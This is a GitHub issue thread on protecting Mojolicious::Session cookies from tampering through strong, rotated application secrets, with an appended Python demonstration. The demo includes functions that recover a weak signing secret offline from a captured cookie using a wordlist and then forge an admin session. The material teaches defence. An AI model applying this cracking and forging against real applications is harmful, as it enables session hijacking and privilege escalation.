
Mention the importance of the application secret to stop Mojolicious::Session cookie tampering #28

Open
richardleach opened this issue Nov 24, 2018 · 2 comments

@richardleach

Hi, I enjoyed your LPW talk today.

The question of tampering with the cookie in apps using Mojolicious::Session came up today; Sessions.md also mentioned possible tampering in the browser.

This is covered well in Day 16: The Secret Life of Sessions but key takeaways are:

  • Mojolicious::Session incorporates the application secret into the cookie signature to prevent tampering.
  • The user can take the contents of a cookie and the signature to try to guess the contents of the secret (offline, so the server doesn't see anything).
  • So it's really important that the secret is changed from the default (which is just the application name IIRC) to something hard to guess (random, has high entropy; the post above suggests 12 chars but I'd go with 17 or more).
  • Brute-force discovery of a strong secret is impractical. (Trying all permutations is computationally infeasible.) But there's always the teeny, tiny chance that an attacker could get lucky with their guessing, so periodic rotation of the secret is a good practice.

As a side note, Mojolicious::Session uses the HMAC-SHA1 algorithm, which isn't as strong as something like HMAC-SHA256, but should still be fine for use. Use of raw SHA-1 for signatures is definitely not safe any more, but no practical attacks against HMAC-SHA1 have been made public.

Would you like a PR for sessions.md that briefly covers the above?

@duffee
Owner

duffee commented Nov 26, 2018

Hi Richard,

Thanks for your comments. Quick reply. You raise some deeper issues that I need to address.

I've written a little on the default secret in Sessions.md, but since version 7 came out this year (and 8 was released in September) the default secret is generated randomly in your app.conf file which covers point 3.

I'll work up my notes this aft and happily take a PR after 5pm GMT (in about 3 hours)

@richardleach
Author

Aha, thanks for letting me know about the default secret. This only happens if you do something like "mojo generate app <appname>" though. I often create single-file throwaway Mojolicious::Lite apps and for these the default secret is still the app moniker. This might catch some people out, so still worth mentioning.

Also, you'd think it'd be obvious, but it's also worth reminding people not to re-use good secrets that they saw in a presentation. I've seen lots of cases on GitHub (not Perl projects) where people have done this. So much so that at my old company, we compiled a list of presentation secrets and used them when trying to crack JWT secrets!
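The mechanism discussed across the three comments above, as an added Python example that is not code from this thread or from Mojolicious itself: a cookie tag is an HMAC-SHA1 keyed with the application secret, so editing the payload in the browser fails verification; an attacker who captures one cookie can guess the secret offline, one HMAC per candidate, and a weak default (the app moniker of a Mojolicious::Lite app, or a secret copied from a talk) falls to a short wordlist, after which the session can be rewritten and re-signed; a 128-bit random secret does not, and rotation is handled by verifying against a list of secrets while signing with the newest. The `value--hexsig` cookie layout and the compact-JSON/base64 session encoding with `=` written as `-` are my reading of Mojolicious::Sessions and Mojolicious::Controller and are assumptions here; the wordlist, app name `myapp` and session contents are constructed, not captured from a real deployment.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional


def encode_session(session: dict) -> str:
    """Session payload as I understand Mojolicious lays it out (assumption):
    compact JSON, base64 without newlines, '=' padding written as '-'."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode().replace("=", "-")


def decode_session(value: str) -> dict:
    return json.loads(base64.b64decode(value.replace("-", "=")))


def hmac_sha1_hex(value: str, secret: str) -> str:
    # The tag the thread describes: HMAC-SHA1 keyed with the application secret.
    return hmac.new(secret.encode(), value.encode(), hashlib.sha1).hexdigest()


def sign(value: str, secret: str) -> str:
    """Signed-cookie layout '<value>--<hex tag>' (assumed, see lead-in)."""
    return f"{value}--{hmac_sha1_hex(value, secret)}"


def split_cookie(cookie: str) -> tuple[str, str]:
    # The hex tag never contains '-', so the last '--' is the separator even
    # when the base64 payload itself ends in '-'.
    value, sep, tag = cookie.rpartition("--")
    if not sep:
        raise ValueError("not a signed cookie")
    return value, tag


def verify(cookie: str, secrets_list: list[str]) -> Optional[dict]:
    """Return the session if any configured secret validates the tag, else None.
    secrets_list[0] is the current secret; older ones stay in the list so a
    rotation does not invalidate every live session at once."""
    try:
        value, tag = split_cookie(cookie)
    except ValueError:
        return None
    for s in secrets_list:
        if hmac.compare_digest(hmac_sha1_hex(value, s), tag):
            return decode_session(value)
    return None


def tamper_without_secret(cookie: str, **changes) -> str:
    """What a browser-only attacker can do: edit the payload, keep the old tag."""
    value, tag = split_cookie(cookie)
    session = decode_session(value)
    session.update(changes)
    return f"{encode_session(session)}--{tag}"


def recover_secret(cookie: str, candidates: list[str]) -> Optional[str]:
    """Offline guess against one captured cookie: one HMAC per candidate,
    no request ever reaches the server."""
    value, tag = split_cookie(cookie)
    for cand in candidates:
        if hmac.compare_digest(hmac_sha1_hex(value, cand), tag):
            return cand
    return None


def forge(cookie: str, secret: str, **changes) -> str:
    """With the secret known, rewrite any field and produce a valid tag."""
    value, _ = split_cookie(cookie)
    session = decode_session(value)
    session.update(changes)
    return sign(encode_session(session), secret)


def demo() -> dict:
    """Constructed walk-through: a throwaway Mojolicious::Lite app called
    'myapp' that never set a secret, so its secret is just the moniker."""
    weak_secrets = ["myapp"]
    cookie = sign(encode_session({"user": "alice", "admin": 0}), weak_secrets[0])

    # Editing the cookie in the browser alone is rejected: the tag no longer matches.
    rejected = verify(tamper_without_secret(cookie, admin=1), weak_secrets) is None

    # Wordlist of likely defaults and secrets lifted from slides (constructed placeholders).
    wordlist = ["mojolicious", "myapp", "s3cret", "supersecret", "change_me"]
    found = recover_secret(cookie, wordlist)
    escalated = verify(forge(cookie, found, admin=1), weak_secrets)

    # A 128-bit random secret: the wordlist misses, and exhaustive search is 2**128 HMACs.
    strong = [secrets.token_hex(16)]
    cookie2 = sign(encode_session({"user": "alice", "admin": 0}), strong[0])
    not_found = recover_secret(cookie2, wordlist)

    # Rotation: prepend a fresh secret; old cookies still verify, new ones need the fresh one.
    rotated = [secrets.token_hex(16)] + strong
    survives_rotation = verify(cookie2, rotated) is not None
    new_cookie = sign(encode_session({"user": "bob"}), rotated[0])
    needs_new_secret = verify(new_cookie, rotated) is not None and verify(new_cookie, strong) is None

    return {
        "rejected_without_secret": rejected,
        "recovered_secret": found,
        "escalated_session": escalated,
        "strong_secret_recovered": not_found,
        "survives_rotation": survives_rotation,
        "new_cookie_needs_new_secret": needs_new_secret,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Note that `recover_secret` is the whole attack: nothing in the cookie rate-limits it and the server cannot observe it, which is why the only defences are a secret the wordlist and a brute-force search cannot reach, and rotating it so a captured cookie ages out of usefulness.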
